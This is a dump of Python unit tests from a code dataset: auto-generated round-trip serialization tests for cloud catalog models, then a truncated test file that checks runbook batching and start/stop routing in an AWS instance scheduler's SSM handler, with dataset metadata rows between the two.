        model = OfferingInstance.from_dict(json_repr)
        assert model != False
        # Rebuild a second instance directly from the attribute dict.
        attrs = OfferingInstance.from_dict(json_repr).__dict__
        twin = OfferingInstance(**attrs)
        # Both construction paths must produce equivalent models.
        assert model == twin
        # Round-tripping back to a dict must be lossless.
        assert model.to_dict() == json_repr
class TestModel_OfferingInstanceLastOperation():
    """
    Test Class for OfferingInstanceLastOperation
    """

    def test_offering_instance_last_operation_serialization(self):
        """
        Test serialization/deserialization for OfferingInstanceLastOperation
        """
        # JSON representation of an OfferingInstanceLastOperation model.
        json_repr = {
            'operation': 'testString',
            'state': 'testString',
            'message': 'testString',
            'transaction_id': 'testString',
            'updated': 'testString',
        }
        # Deserialize the JSON into a model instance.
        model = OfferingInstanceLastOperation.from_dict(json_repr)
        assert model != False
        # Rebuild a second instance directly from the attribute dict.
        attrs = OfferingInstanceLastOperation.from_dict(json_repr).__dict__
        twin = OfferingInstanceLastOperation(**attrs)
        # Both construction paths must produce equivalent models.
        assert model == twin
        # Round-tripping back to a dict must be lossless.
        assert model.to_dict() == json_repr
class TestModel_OfferingSearchResult():
    """
    Test Class for OfferingSearchResult
    """

    def test_offering_search_result_serialization(self):
        """
        Test serialization/deserialization for OfferingSearchResult
        """
        # Dict forms of all nested models needed to build an Offering resource.
        rating = {  # Rating
            'one_star_count': 38,
            'two_star_count': 38,
            'three_star_count': 38,
            'four_star_count': 38,
        }
        feature = {  # Feature
            'title': 'testString',
            'description': 'testString',
        }
        configuration = {  # Configuration
            'key': 'testString',
            'type': 'testString',
            'default_value': { 'foo': 'bar' },
            'value_constraint': 'testString',
            'description': 'testString',
            'required': True,
            'options': [{ 'foo': 'bar' }],
            'hidden': True,
        }
        validation = {  # Validation
            'validated': "2019-01-01T12:00:00Z",
            'requested': "2019-01-01T12:00:00Z",
            'state': 'testString',
            'last_operation': 'testString',
            'target': {},
        }
        resource = {  # Resource
            'type': 'mem',
            'value': { 'foo': 'bar' },
        }
        script = {  # Script
            'instructions': 'testString',
            'script': 'testString',
            'script_permission': 'testString',
            'delete_script': 'testString',
            'scope': 'testString',
        }
        entitlement = {  # VersionEntitlement
            'provider_name': 'testString',
            'provider_id': 'testString',
            'product_id': 'testString',
            'part_numbers': ['testString'],
            'image_repo_name': 'testString',
        }
        license = {  # License
            'id': 'testString',
            'name': 'testString',
            'type': 'testString',
            'url': 'testString',
            'description': 'testString',
        }
        state = {  # State
            'current': 'testString',
            'current_entered': "2019-01-01T12:00:00Z",
            'pending': 'testString',
            'pending_requested': "2019-01-01T12:00:00Z",
            'previous': 'testString',
        }
        version = {  # Version
            'id': 'testString',
            '_rev': 'testString',
            'crn': 'testString',
            'version': 'testString',
            'sha': 'testString',
            'created': "2019-01-01T12:00:00Z",
            'updated': "2019-01-01T12:00:00Z",
            'offering_id': 'testString',
            'catalog_id': 'testString',
            'kind_id': 'testString',
            'tags': ['testString'],
            'repo_url': 'testString',
            'source_url': 'testString',
            'tgz_url': 'testString',
            'configuration': [configuration],
            'metadata': {},
            'validation': validation,
            'required_resources': [resource],
            'single_instance': True,
            'install': script,
            'pre_install': [script],
            'entitlement': entitlement,
            'licenses': [license],
            'image_manifest_url': 'testString',
            'deprecated': True,
            'package_version': 'testString',
            'state': state,
            'version_locator': 'testString',
            'console_url': 'testString',
            'long_description': 'testString',
            'whitelisted_accounts': ['testString'],
        }
        deployment = {  # Deployment
            'id': 'testString',
            'label': 'testString',
            'name': 'testString',
            'short_description': 'testString',
            'long_description': 'testString',
            'metadata': {},
            'tags': ['testString'],
            'created': "2019-01-01T12:00:00Z",
            'updated': "2019-01-01T12:00:00Z",
        }
        plan = {  # Plan
            'id': 'testString',
            'label': 'testString',
            'name': 'testString',
            'short_description': 'testString',
            'long_description': 'testString',
            'metadata': {},
            'tags': ['testString'],
            'additional_features': [feature],
            'created': "2019-01-01T12:00:00Z",
            'updated': "2019-01-01T12:00:00Z",
            'deployments': [deployment],
        }
        kind = {  # Kind
            'id': 'testString',
            'format_kind': 'testString',
            'target_kind': 'testString',
            'metadata': {},
            'install_description': 'testString',
            'tags': ['testString'],
            'additional_features': [feature],
            'created': "2019-01-01T12:00:00Z",
            'updated': "2019-01-01T12:00:00Z",
            'versions': [version],
            'plans': [plan],
        }
        repo_info = {  # RepoInfo
            'token': 'testString',
            'type': 'testString',
        }
        offering = {  # Offering
            'id': 'testString',
            '_rev': 'testString',
            'url': 'testString',
            'crn': 'testString',
            'label': 'testString',
            'name': 'testString',
            'offering_icon_url': 'testString',
            'offering_docs_url': 'testString',
            'offering_support_url': 'testString',
            'tags': ['testString'],
            'keywords': ['testString'],
            'rating': rating,
            'created': "2019-01-01T12:00:00Z",
            'updated': "2019-01-01T12:00:00Z",
            'short_description': 'testString',
            'long_description': 'testString',
            'features': [feature],
            'kinds': [kind],
            'permit_request_ibm_public_publish': True,
            'ibm_publish_approved': True,
            'public_publish_approved': True,
            'public_original_crn': 'testString',
            'publish_public_crn': 'testString',
            'portal_approval_record': 'testString',
            'portal_ui_url': 'testString',
            'catalog_id': 'testString',
            'catalog_name': 'testString',
            'metadata': {},
            'disclaimer': 'testString',
            'hidden': True,
            'provider': 'testString',
            'repo_info': repo_info,
        }
        # JSON representation of an OfferingSearchResult model.
        json_repr = {
            'offset': 38,
            'limit': 38,
            'total_count': 38,
            'resource_count': 38,
            'first': 'testString',
            'last': 'testString',
            'prev': 'testString',
            'next': 'testString',
            'resources': [offering],
        }
        # Deserialize the JSON into a model instance.
        model = OfferingSearchResult.from_dict(json_repr)
        assert model != False
        # Rebuild a second instance directly from the attribute dict.
        attrs = OfferingSearchResult.from_dict(json_repr).__dict__
        twin = OfferingSearchResult(**attrs)
        # Both construction paths must produce equivalent models.
        assert model == twin
        # Round-tripping back to a dict must be lossless.
        assert model.to_dict() == json_repr
class TestModel_OperatorDeployResult():
    """
    Test Class for OperatorDeployResult
    """

    def test_operator_deploy_result_serialization(self):
        """
        Test serialization/deserialization for OperatorDeployResult
        """
        # JSON representation of an OperatorDeployResult model.
        json_repr = {
            'phase': 'testString',
            'message': 'testString',
            'link': 'testString',
            'name': 'testString',
            'version': 'testString',
            'namespace': 'testString',
            'package_name': 'testString',
            'catalog_id': 'testString',
        }
        # Deserialize the JSON into a model instance.
        model = OperatorDeployResult.from_dict(json_repr)
        assert model != False
        # Rebuild a second instance directly from the attribute dict.
        attrs = OperatorDeployResult.from_dict(json_repr).__dict__
        twin = OperatorDeployResult(**attrs)
        # Both construction paths must produce equivalent models.
        assert model == twin
        # Round-tripping back to a dict must be lossless.
        assert model.to_dict() == json_repr
class TestModel_Plan():
    """
    Test Class for Plan
    """

    def test_plan_serialization(self):
        """
        Test serialization/deserialization for Plan
        """
        # Dict forms of the nested models needed to build a Plan.
        feature = {  # Feature
            'title': 'testString',
            'description': 'testString',
        }
        deployment = {  # Deployment
            'id': 'testString',
            'label': 'testString',
            'name': 'testString',
            'short_description': 'testString',
            'long_description': 'testString',
            'metadata': {},
            'tags': ['testString'],
            'created': "2019-01-01T12:00:00Z",
            'updated': "2019-01-01T12:00:00Z",
        }
        # JSON representation of a Plan model.
        json_repr = {
            'id': 'testString',
            'label': 'testString',
            'name': 'testString',
            'short_description': 'testString',
            'long_description': 'testString',
            'metadata': {},
            'tags': ['testString'],
            'additional_features': [feature],
            'created': "2019-01-01T12:00:00Z",
            'updated': "2019-01-01T12:00:00Z",
            'deployments': [deployment],
        }
        # Deserialize the JSON into a model instance.
        model = Plan.from_dict(json_repr)
        assert model != False
        # Rebuild a second instance directly from the attribute dict.
        attrs = Plan.from_dict(json_repr).__dict__
        twin = Plan(**attrs)
        # Both construction paths must produce equivalent models.
        assert model == twin
        # Round-tripping back to a dict must be lossless.
        assert model.to_dict() == json_repr
class TestModel_PublishObject():
    """
    Test Class for PublishObject
    """

    def test_publish_object_serialization(self):
        """
        Test serialization/deserialization for PublishObject
        """
        # JSON form of a PublishObject, written as one dict literal.
        model_json = {
            'permit_ibm_public_publish': True,
            'ibm_approved': True,
            'public_approved': True,
            'portal_approval_record': 'testString',
            'portal_url': 'testString',
        }

        # Deserialize the dict into a model instance.
        model = PublishObject.from_dict(model_json)
        assert model != False

        # Build a second instance from the first's attribute dict; both must compare equal.
        model2 = PublishObject(**PublishObject.from_dict(model_json).__dict__)
        assert model == model2

        # Serializing back to a dict must be lossless.
        assert model.to_dict() == model_json
class TestModel_Rating():
    """
    Test Class for Rating
    """

    def test_rating_serialization(self):
        """
        Test serialization/deserialization for Rating
        """
        # JSON form of a Rating, written as one dict literal.
        model_json = {
            'one_star_count': 38,
            'two_star_count': 38,
            'three_star_count': 38,
            'four_star_count': 38,
        }

        # Deserialize the dict into a model instance.
        model = Rating.from_dict(model_json)
        assert model != False

        # Build a second instance from the first's attribute dict; both must compare equal.
        model2 = Rating(**Rating.from_dict(model_json).__dict__)
        assert model == model2

        # Serializing back to a dict must be lossless.
        assert model.to_dict() == model_json
class TestModel_RepoInfo():
    """
    Test Class for RepoInfo
    """

    def test_repo_info_serialization(self):
        """
        Test serialization/deserialization for RepoInfo
        """
        # JSON form of a RepoInfo, written as one dict literal.
        model_json = {
            'token': 'testString',
            'type': 'testString',
        }

        # Deserialize the dict into a model instance.
        model = RepoInfo.from_dict(model_json)
        assert model != False

        # Build a second instance from the first's attribute dict; both must compare equal.
        model2 = RepoInfo(**RepoInfo.from_dict(model_json).__dict__)
        assert model == model2

        # Serializing back to a dict must be lossless.
        assert model.to_dict() == model_json
class TestModel_Resource():
    """
    Test Class for Resource
    """

    def test_resource_serialization(self):
        """
        Test serialization/deserialization for Resource
        """
        # JSON form of a Resource, written as one dict literal.
        model_json = {
            'type': 'mem',
            'value': {'foo': 'bar'},
        }

        # Deserialize the dict into a model instance.
        model = Resource.from_dict(model_json)
        assert model != False

        # Build a second instance from the first's attribute dict; both must compare equal.
        model2 = Resource(**Resource.from_dict(model_json).__dict__)
        assert model == model2

        # Serializing back to a dict must be lossless.
        assert model.to_dict() == model_json
class TestModel_Script():
    """
    Test Class for Script
    """

    def test_script_serialization(self):
        """
        Test serialization/deserialization for Script
        """
        # JSON form of a Script, written as one dict literal.
        model_json = {
            'instructions': 'testString',
            'script': 'testString',
            'script_permission': 'testString',
            'delete_script': 'testString',
            'scope': 'testString',
        }

        # Deserialize the dict into a model instance.
        model = Script.from_dict(model_json)
        assert model != False

        # Build a second instance from the first's attribute dict; both must compare equal.
        model2 = Script(**Script.from_dict(model_json).__dict__)
        assert model == model2

        # Serializing back to a dict must be lossless.
        assert model.to_dict() == model_json
class TestModel_State():
    """
    Test Class for State
    """

    def test_state_serialization(self):
        """
        Test serialization/deserialization for State
        """
        # JSON form of a State, written as one dict literal.
        model_json = {
            'current': 'testString',
            'current_entered': "2019-01-01T12:00:00Z",
            'pending': 'testString',
            'pending_requested': "2019-01-01T12:00:00Z",
            'previous': 'testString',
        }

        # Deserialize the dict into a model instance.
        model = State.from_dict(model_json)
        assert model != False

        # Build a second instance from the first's attribute dict; both must compare equal.
        model2 = State(**State.from_dict(model_json).__dict__)
        assert model == model2

        # Serializing back to a dict must be lossless.
        assert model.to_dict() == model_json
class TestModel_SyndicationAuthorization():
    """
    Test Class for SyndicationAuthorization
    """

    def test_syndication_authorization_serialization(self):
        """
        Test serialization/deserialization for SyndicationAuthorization
        """
        # JSON form of a SyndicationAuthorization, written as one dict literal.
        model_json = {
            'token': 'testString',
            'last_run': "2019-01-01T12:00:00Z",
        }

        # Deserialize the dict into a model instance.
        model = SyndicationAuthorization.from_dict(model_json)
        assert model != False

        # Build a second instance from the first's attribute dict; both must compare equal.
        model2 = SyndicationAuthorization(**SyndicationAuthorization.from_dict(model_json).__dict__)
        assert model == model2

        # Serializing back to a dict must be lossless.
        assert model.to_dict() == model_json
class TestModel_SyndicationCluster():
    """
    Test Class for SyndicationCluster
    """

    def test_syndication_cluster_serialization(self):
        """
        Test serialization/deserialization for SyndicationCluster
        """
        # JSON form of a SyndicationCluster, written as one dict literal.
        model_json = {
            'region': 'testString',
            'id': 'testString',
            'name': 'testString',
            'resource_group_name': 'testString',
            'type': 'testString',
            'namespaces': ['testString'],
            'all_namespaces': True,
        }

        # Deserialize the dict into a model instance.
        model = SyndicationCluster.from_dict(model_json)
        assert model != False

        # Build a second instance from the first's attribute dict; both must compare equal.
        model2 = SyndicationCluster(**SyndicationCluster.from_dict(model_json).__dict__)
        assert model == model2

        # Serializing back to a dict must be lossless.
        assert model.to_dict() == model_json
class TestModel_SyndicationHistory():
    """
    Test Class for SyndicationHistory
    """

    def test_syndication_history_serialization(self):
        """
        Test serialization/deserialization for SyndicationHistory
        """
        # Nested sub-model dict needed to build a SyndicationHistory.
        syndication_cluster_model = {  # SyndicationCluster
            'region': 'testString',
            'id': 'testString',
            'name': 'testString',
            'resource_group_name': 'testString',
            'type': 'testString',
            'namespaces': ['testString'],
            'all_namespaces': True,
        }

        # JSON form of a SyndicationHistory, written as one dict literal.
        model_json = {
            'namespaces': ['testString'],
            'clusters': [syndication_cluster_model],
            'last_run': "2019-01-01T12:00:00Z",
        }

        # Deserialize the dict into a model instance.
        model = SyndicationHistory.from_dict(model_json)
        assert model != False

        # Build a second instance from the first's attribute dict; both must compare equal.
        model2 = SyndicationHistory(**SyndicationHistory.from_dict(model_json).__dict__)
        assert model == model2

        # Serializing back to a dict must be lossless.
        assert model.to_dict() == model_json
class TestModel_SyndicationResource():
    """
    Test Class for SyndicationResource
    """

    def test_syndication_resource_serialization(self):
        """
        Test serialization/deserialization for SyndicationResource
        """
        # Nested sub-model dicts needed to build a SyndicationResource.
        syndication_cluster_model = {  # SyndicationCluster
            'region': 'testString',
            'id': 'testString',
            'name': 'testString',
            'resource_group_name': 'testString',
            'type': 'testString',
            'namespaces': ['testString'],
            'all_namespaces': True,
        }
        syndication_history_model = {  # SyndicationHistory
            'namespaces': ['testString'],
            'clusters': [syndication_cluster_model],
            'last_run': "2019-01-01T12:00:00Z",
        }
        syndication_authorization_model = {  # SyndicationAuthorization
            'token': 'testString',
            'last_run': "2019-01-01T12:00:00Z",
        }

        # JSON form of a SyndicationResource, written as one dict literal.
        model_json = {
            'remove_related_components': True,
            'clusters': [syndication_cluster_model],
            'history': syndication_history_model,
            'authorization': syndication_authorization_model,
        }

        # Deserialize the dict into a model instance.
        model = SyndicationResource.from_dict(model_json)
        assert model != False

        # Build a second instance from the first's attribute dict; both must compare equal.
        model2 = SyndicationResource(**SyndicationResource.from_dict(model_json).__dict__)
        assert model == model2

        # Serializing back to a dict must be lossless.
        assert model.to_dict() == model_json
class TestModel_Validation():
    """
    Test Class for Validation
    """

    def test_validation_serialization(self):
        """
        Test serialization/deserialization for Validation
        """
        # JSON form of a Validation, written as one dict literal.
        model_json = {
            'validated': "2019-01-01T12:00:00Z",
            'requested': "2019-01-01T12:00:00Z",
            'state': 'testString',
            'last_operation': 'testString',
            'target': {},
        }

        # Deserialize the dict into a model instance.
        model = Validation.from_dict(model_json)
        assert model != False

        # Build a second instance from the first's attribute dict; both must compare equal.
        model2 = Validation(**Validation.from_dict(model_json).__dict__)
        assert model == model2

        # Serializing back to a dict must be lossless.
        assert model.to_dict() == model_json
class TestModel_Version():
    """
    Test Class for Version
    """

    def test_version_serialization(self):
        """
        Test serialization/deserialization for Version
        """
        # Nested sub-model dicts needed to build a Version.
        configuration_model = {  # Configuration
            'key': 'testString',
            'type': 'testString',
            'default_value': {'foo': 'bar'},
            'value_constraint': 'testString',
            'description': 'testString',
            'required': True,
            'options': [{'foo': 'bar'}],
            'hidden': True,
        }
        validation_model = {  # Validation
            'validated': "2019-01-01T12:00:00Z",
            'requested': "2019-01-01T12:00:00Z",
            'state': 'testString',
            'last_operation': 'testString',
            'target': {},
        }
        resource_model = {  # Resource
            'type': 'mem',
            'value': {'foo': 'bar'},
        }
        script_model = {  # Script
            'instructions': 'testString',
            'script': 'testString',
            'script_permission': 'testString',
            'delete_script': 'testString',
            'scope': 'testString',
        }
        version_entitlement_model = {  # VersionEntitlement
            'provider_name': 'testString',
            'provider_id': 'testString',
            'product_id': 'testString',
            'part_numbers': ['testString'],
            'image_repo_name': 'testString',
        }
        license_model = {  # License
            'id': 'testString',
            'name': 'testString',
            'type': 'testString',
            'url': 'testString',
            'description': 'testString',
        }
        state_model = {  # State
            'current': 'testString',
            'current_entered': "2019-01-01T12:00:00Z",
            'pending': 'testString',
            'pending_requested': "2019-01-01T12:00:00Z",
            'previous': 'testString',
        }

        # JSON form of a Version, written as one dict literal.
        model_json = {
            'id': 'testString',
            '_rev': 'testString',
            'crn': 'testString',
            'version': 'testString',
            'sha': 'testString',
            'created': "2019-01-01T12:00:00Z",
            'updated': "2019-01-01T12:00:00Z",
            'offering_id': 'testString',
            'catalog_id': 'testString',
            'kind_id': 'testString',
            'tags': ['testString'],
            'repo_url': 'testString',
            'source_url': 'testString',
            'tgz_url': 'testString',
            'configuration': [configuration_model],
            'metadata': {},
            'validation': validation_model,
            'required_resources': [resource_model],
            'single_instance': True,
            'install': script_model,
            'pre_install': [script_model],
            'entitlement': version_entitlement_model,
            'licenses': [license_model],
            'image_manifest_url': 'testString',
            'deprecated': True,
            'package_version': 'testString',
            'state': state_model,
            'version_locator': 'testString',
            'console_url': 'testString',
            'long_description': 'testString',
            'whitelisted_accounts': ['testString'],
        }

        # Deserialize the dict into a model instance.
        model = Version.from_dict(model_json)
        assert model != False

        # Build a second instance from the first's attribute dict; both must compare equal.
        model2 = Version(**Version.from_dict(model_json).__dict__)
        assert model == model2

        # Serializing back to a dict must be lossless.
        assert model.to_dict() == model_json
class TestModel_VersionEntitlement():
    """
    Test Class for VersionEntitlement
    """

    def test_version_entitlement_serialization(self):
        """
        Test serialization/deserialization for VersionEntitlement
        """
        # JSON form of a VersionEntitlement, written as one dict literal.
        model_json = {
            'provider_name': 'testString',
            'provider_id': 'testString',
            'product_id': 'testString',
            'part_numbers': ['testString'],
            'image_repo_name': 'testString',
        }

        # Deserialize the dict into a model instance.
        model = VersionEntitlement.from_dict(model_json)
        assert model != False

        # Build a second instance from the first's attribute dict; both must compare equal.
        model2 = VersionEntitlement(**VersionEntitlement.from_dict(model_json).__dict__)
        assert model == model2

        # Serializing back to a dict must be lossless.
        assert model.to_dict() == model_json
class TestModel_VersionUpdateDescriptor():
    """
    Test Class for VersionUpdateDescriptor
    """

    def test_version_update_descriptor_serialization(self):
        """
        Test serialization/deserialization for VersionUpdateDescriptor
        """
        # Nested sub-model dicts needed to build a VersionUpdateDescriptor.
        state_model = {  # State
            'current': 'testString',
            'current_entered': "2019-01-01T12:00:00Z",
            'pending': 'testString',
            'pending_requested': "2019-01-01T12:00:00Z",
            'previous': 'testString',
        }
        resource_model = {  # Resource
            'type': 'mem',
            'value': {'foo': 'bar'},
        }

        # JSON form of a VersionUpdateDescriptor, written as one dict literal.
        model_json = {
            'version_locator': 'testString',
            'version': 'testString',
            'state': state_model,
            'required_resources': [resource_model],
            'package_version': 'testString',
            'can_update': True,
            'messages': {},
        }

        # Deserialize the dict into a model instance.
        model = VersionUpdateDescriptor.from_dict(model_json)
        assert model != False

        # Build a second instance from the first's attribute dict; both must compare equal.
        model2 = VersionUpdateDescriptor(**VersionUpdateDescriptor.from_dict(model_json).__dict__)
        assert model == model2

        # Serializing back to a dict must be lossless.
        assert model.to_dict() == model_json
# endregion
##############################################################################
# End of Model Tests
##############################################################################
| 52.531685
| 4,243
| 0.642423
| 55,085
| 505,670
| 5.599909
| 0.009767
| 0.012059
| 0.022109
| 0.026129
| 0.944682
| 0.912776
| 0.873962
| 0.842572
| 0.829063
| 0.817707
| 0
| 0.030148
| 0.216647
| 505,670
| 9,625
| 4,244
| 52.537143
| 0.748588
| 0.112281
| 0
| 0.747376
| 0
| 0.015916
| 0.433421
| 0.083916
| 0
| 0
| 0
| 0
| 0.109042
| 1
| 0.046901
| false
| 0.001524
| 0.004741
| 0
| 0.095157
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
278ac93317faee21c8164f2d7bb518b472e0abaf
| 14,414
|
py
|
Python
|
source/lambda/tests/test_ssm_handler.py
|
elduds/aws-instance-scheduler
|
4b4c8a628fd0ab34e7d5c17af215f0bf10e48bd8
|
[
"Apache-2.0"
] | 338
|
2018-02-09T17:24:26.000Z
|
2021-10-06T01:33:52.000Z
|
source/lambda/tests/test_ssm_handler.py
|
elduds/aws-instance-scheduler
|
4b4c8a628fd0ab34e7d5c17af215f0bf10e48bd8
|
[
"Apache-2.0"
] | 267
|
2018-02-09T10:45:25.000Z
|
2021-10-15T14:47:34.000Z
|
source/lambda/tests/test_ssm_handler.py
|
elduds/aws-instance-scheduler
|
4b4c8a628fd0ab34e7d5c17af215f0bf10e48bd8
|
[
"Apache-2.0"
] | 193
|
2018-02-14T08:25:30.000Z
|
2021-10-06T14:59:14.000Z
|
######################################################################################################################
# Copyright 2021 Amazon.com, Inc. or its affiliates. All Rights Reserved. #
# #
# Licensed under the Apache License Version 2.0 (the "License"). You may not use this file except in compliance #
# with the License. A copy of the License is located at #
# #
# http://www.apache.org/licenses/ #
# #
# or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES #
# OR CONDITIONS OF ANY KIND, express or implied. See the License for the specific language governing permissions #
# and limitations under the License. #
######################################################################################################################
from schedulers.ssm_handler import SSMHandler
from util.logger import Logger
import datetime
from unittest.mock import call
#import schedulers
def get_logger():
    """Build a Logger whose stream name embeds today's UTC date (YYYYMMDD)."""
    now = datetime.datetime.utcnow()
    stream_name = "{}-{:0>4d}{:0>2d}{:0>2d}".format(
        'test_configuration_module', now.year, now.month, now.day)
    return Logger(logstream=stream_name, buffersize=30, context={},
                  loggroup="test_configuration_module")
def test_run_ssm_runbook_with_multiple_of_max_accounts(mocker):
    """10 accounts (an exact multiple of the 5-account batch size) must be
    split into two target locations within a single API call."""
    handler = SSMHandler(
        accounts=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9],
        automation_assume_role_arn="test_role",
        execution_role_name="test_role",
        logger=get_logger(),
        regions=["us-east-1", "us-east-2"],
        started_tags=[{'Key': 'ScheduleStarted', 'Value': "Date-time-message"}],
        stopped_tags=[{'Key': 'ScheduleStopped', 'Value': "Date-time-message"}],
    )
    api_mock = mocker.patch.object(handler, 'execute_ssm_api')
    api_mock.return_value = 'aaas'

    response = handler.run_ssm_runbook(
        ssm_runbook_name="EC2_START_SSM_DOC",
        schedule_tag_name='Schedule',
        schedule_tag_value='office-hours-uk',
        tags=[{'Key': 'ScheduleStarted', 'Value': "Date-time-message"}],
    )

    assert response == 'aaas'
    assert api_mock.call_count == 1
    # One call, with accounts batched 5-at-a-time into two target locations.
    expected = [
        call(ssm_runbook_name='EC2_START_SSM_DOC', schedule_tag_name='Schedule', schedule_tag_value='office-hours-uk',
             tags=[{'Key': 'ScheduleStarted', 'Value': "Date-time-message"}],
             target_locations=[
                 {'Accounts': [0, 1, 2, 3, 4], 'Regions': ['us-east-1', 'us-east-2'], 'ExecutionRoleName': 'test_role', 'TargetLocationMaxConcurrency': '100%', 'TargetLocationMaxErrors': '10%'},
                 {'Accounts': [5, 6, 7, 8, 9], 'Regions': ['us-east-1', 'us-east-2'], 'ExecutionRoleName': 'test_role', 'TargetLocationMaxConcurrency': '100%', 'TargetLocationMaxErrors': '10%'}
             ])
    ]
    api_mock.assert_has_calls(expected)
def test_run_ssm_runbook_with_max_accounts(mocker):
    """Exactly 5 accounts (one full batch) must yield a single target location."""
    handler = SSMHandler(
        accounts=[0, 1, 2, 3, 4],
        automation_assume_role_arn="test_role",
        execution_role_name="test_role",
        logger=get_logger(),
        regions=["us-east-1", "us-east-2"],
        started_tags=[{'Key': 'ScheduleStarted', 'Value': "Date-time-message"}],
        stopped_tags=[{'Key': 'ScheduleStopped', 'Value': "Date-time-message"}],
    )
    api_mock = mocker.patch.object(handler, 'execute_ssm_api')
    api_mock.return_value = 'aaas'

    response = handler.run_ssm_runbook(
        ssm_runbook_name="EC2_START_SSM_DOC",
        schedule_tag_name='Schedule',
        schedule_tag_value='office-hours-uk',
        tags=[{'Key': 'ScheduleStarted', 'Value': "Date-time-message"}],
    )

    assert response == 'aaas'
    assert api_mock.call_count == 1
    # One call with a single 5-account target location.
    expected = [
        call(ssm_runbook_name='EC2_START_SSM_DOC', schedule_tag_name='Schedule', schedule_tag_value='office-hours-uk',
             tags=[{'Key': 'ScheduleStarted', 'Value': "Date-time-message"}],
             target_locations=[{'Accounts': [0, 1, 2, 3, 4], 'Regions': ['us-east-1', 'us-east-2'], 'ExecutionRoleName': 'test_role', 'TargetLocationMaxConcurrency': '100%', 'TargetLocationMaxErrors': '10%'}])
    ]
    api_mock.assert_has_calls(expected)
def test_run_ssm_runbook_with_multiple_and_less_than_remainder_0_of_max_accounts(mocker):
    """7 accounts (one full batch plus a remainder of 2) must produce two
    target locations of sizes 5 and 2 within a single API call."""
    handler = SSMHandler(
        accounts=[0, 1, 2, 3, 4, 5, 6],
        automation_assume_role_arn="test_role",
        execution_role_name="test_role",
        logger=get_logger(),
        regions=["us-east-1", "us-east-2"],
        started_tags=[{'Key': 'ScheduleStarted', 'Value': "Date-time-message"}],
        stopped_tags=[{'Key': 'ScheduleStopped', 'Value': "Date-time-message"}],
    )
    api_mock = mocker.patch.object(handler, 'execute_ssm_api')
    api_mock.return_value = 'aaas'

    response = handler.run_ssm_runbook(
        ssm_runbook_name="EC2_START_SSM_DOC",
        schedule_tag_name='Schedule',
        schedule_tag_value='office-hours-uk',
        tags=[{'Key': 'ScheduleStarted', 'Value': "Date-time-message"}],
    )

    assert response == 'aaas'
    assert api_mock.call_count == 1
    # One call with a full batch of 5 followed by the 2-account remainder.
    expected = [
        call(ssm_runbook_name='EC2_START_SSM_DOC', schedule_tag_name='Schedule', schedule_tag_value='office-hours-uk',
             tags=[{'Key': 'ScheduleStarted', 'Value': "Date-time-message"}],
             target_locations=[
                 {'Accounts': [0, 1, 2, 3, 4], 'Regions': ['us-east-1', 'us-east-2'], 'ExecutionRoleName': 'test_role', 'TargetLocationMaxConcurrency': '100%', 'TargetLocationMaxErrors': '10%'},
                 {'Accounts': [5, 6], 'Regions': ['us-east-1', 'us-east-2'], 'ExecutionRoleName': 'test_role', 'TargetLocationMaxConcurrency': '100%', 'TargetLocationMaxErrors': '10%'}])
    ]
    api_mock.assert_has_calls(expected)
def test_start_run_rds_instances_document(mocker):
    """A 'running' desired state must dispatch the RDS-instances START runbook
    with the handler's started tags."""
    handler = SSMHandler(
        accounts=[0, 1, 2, 3, 4, 5, 6],
        automation_assume_role_arn="test_role",
        execution_role_name="test_role",
        logger=get_logger(),
        regions=["us-east-1", "us-east-2"],
        started_tags=[{'Key': 'ScheduleStarted', 'Value': "Date-time-message"}],
        stopped_tags=[{'Key': 'ScheduleStopped', 'Value': "Date-time-message"}],
    )
    runbook_mock = mocker.patch.object(handler, 'run_ssm_runbook')
    runbook_mock.return_value = 'aaas'

    response = handler.run_rds_instances_document('Schedule', 'office-hours-uk', 'running')

    assert runbook_mock.call_count == 1
    runbook_mock.assert_has_calls([
        call('RDS_INSTANCES_START_SSM_DOC', 'Schedule', 'office-hours-uk',
             [{'Key': 'ScheduleStarted', 'Value': "Date-time-message"}])
    ])
    assert response == 'aaas'
def test_stop_run_rds_instances_document(mocker):
    """Desired state 'stopped' routes to the RDS-instances *stop* runbook with the stopped tags."""
    stopped_tags = [{"Key": "ScheduleStopped", "Value": "Date-time-message"}]
    handler = SSMHandler(
        accounts=[0, 1, 2, 3, 4, 5, 6],
        automation_assume_role_arn="test_role",
        execution_role_name="test_role",
        logger=get_logger(),
        regions=["us-east-1", "us-east-2"],
        started_tags=[{"Key": "ScheduleStarted", "Value": "Date-time-message"}],
        stopped_tags=stopped_tags,
    )
    runbook_mock = mocker.patch.object(handler, "run_ssm_runbook")
    runbook_mock.return_value = "aaas"
    response = handler.run_rds_instances_document("Schedule", "office-hours-uk", "stopped")
    assert runbook_mock.call_count == 1
    runbook_mock.assert_has_calls(
        [call("RDS_INSTANCES_STOP_SSM_DOC", "Schedule", "office-hours-uk", stopped_tags)]
    )
    assert response == "aaas"
def test_stop_run_rds_clusters_document(mocker):
    """Desired state 'stopped' routes to the RDS-clusters *stop* runbook with the stopped tags."""
    stopped_tags = [{"Key": "ScheduleStopped", "Value": "Date-time-message"}]
    handler = SSMHandler(
        accounts=[0, 1, 2, 3, 4, 5, 6],
        automation_assume_role_arn="test_role",
        execution_role_name="test_role",
        logger=get_logger(),
        regions=["us-east-1", "us-east-2"],
        started_tags=[{"Key": "ScheduleStarted", "Value": "Date-time-message"}],
        stopped_tags=stopped_tags,
    )
    runbook_mock = mocker.patch.object(handler, "run_ssm_runbook")
    runbook_mock.return_value = "aaas"
    response = handler.run_rds_clusters_document("Schedule", "office-hours-uk", "stopped")
    assert runbook_mock.call_count == 1
    runbook_mock.assert_has_calls(
        [call("RDS_CLUSTERS_STOP_SSM_DOC", "Schedule", "office-hours-uk", stopped_tags)]
    )
    assert response == "aaas"
def test_start_run_rds_clusters_document(mocker):
    """Desired state 'running' routes to the RDS-clusters *start* runbook with the started tags."""
    started_tags = [{"Key": "ScheduleStarted", "Value": "Date-time-message"}]
    handler = SSMHandler(
        accounts=[0, 1, 2, 3, 4, 5, 6],
        automation_assume_role_arn="test_role",
        execution_role_name="test_role",
        logger=get_logger(),
        regions=["us-east-1", "us-east-2"],
        started_tags=started_tags,
